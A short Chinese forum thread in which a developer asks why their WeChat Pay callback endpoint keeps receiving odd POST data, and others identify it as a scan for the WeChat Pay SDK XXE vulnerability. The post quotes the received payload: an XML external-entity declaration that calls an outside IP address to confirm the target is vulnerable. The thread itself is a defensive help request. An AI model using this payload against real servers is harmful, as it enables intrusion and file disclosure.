微信支付确认接口，总是收到这样的post数据，是什么原因？

Edesigner. · 发表于 2018-11-12 08:33:37

微信支付确认接口是架设在客户服务器上，用来接收来自微信服务器发来的通知，当有人支付成功后会通知客户服务器，支付成功了。是以post的方式来通信，格式是xml。但最近我两台服务器，两个不同的公司账户都收到类似的信息，这数据肯定不是微信发过来。来自的ip都是同一个。这是什么回事？
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % xxe SYSTEM "http://101.91.62.170:4837/wx_xxe_dbc_os_2018111203_832?aHR0cHM6Ly93d3cubmV0aGlidXkuY24vZ3JvdXBidXkvbm90aWZ5">
%xxe;
]>

Ray______ · 发表于 2018-11-12 08:40:57

之前在阿里云也接收过一些不是我自己应用得消息
一个是阿里云自己扫描的，一个是国外IP发的http消息，查了下像是触发啥漏洞的

aozima · 发表于 2018-11-12 09:12:35

肯定对微信的消息要双向认证哈。

Edesigner. · 发表于 2018-11-12 11:17:58

微信支付sdk被曝xxe漏洞，漏洞原理分析
https://my.oschina.net/passerman/blog/1840218

微信支付确认接口，总是收到这样的post数据，是什么原因？

阿莫论坛20周年了！感谢大家的支持与爱护！！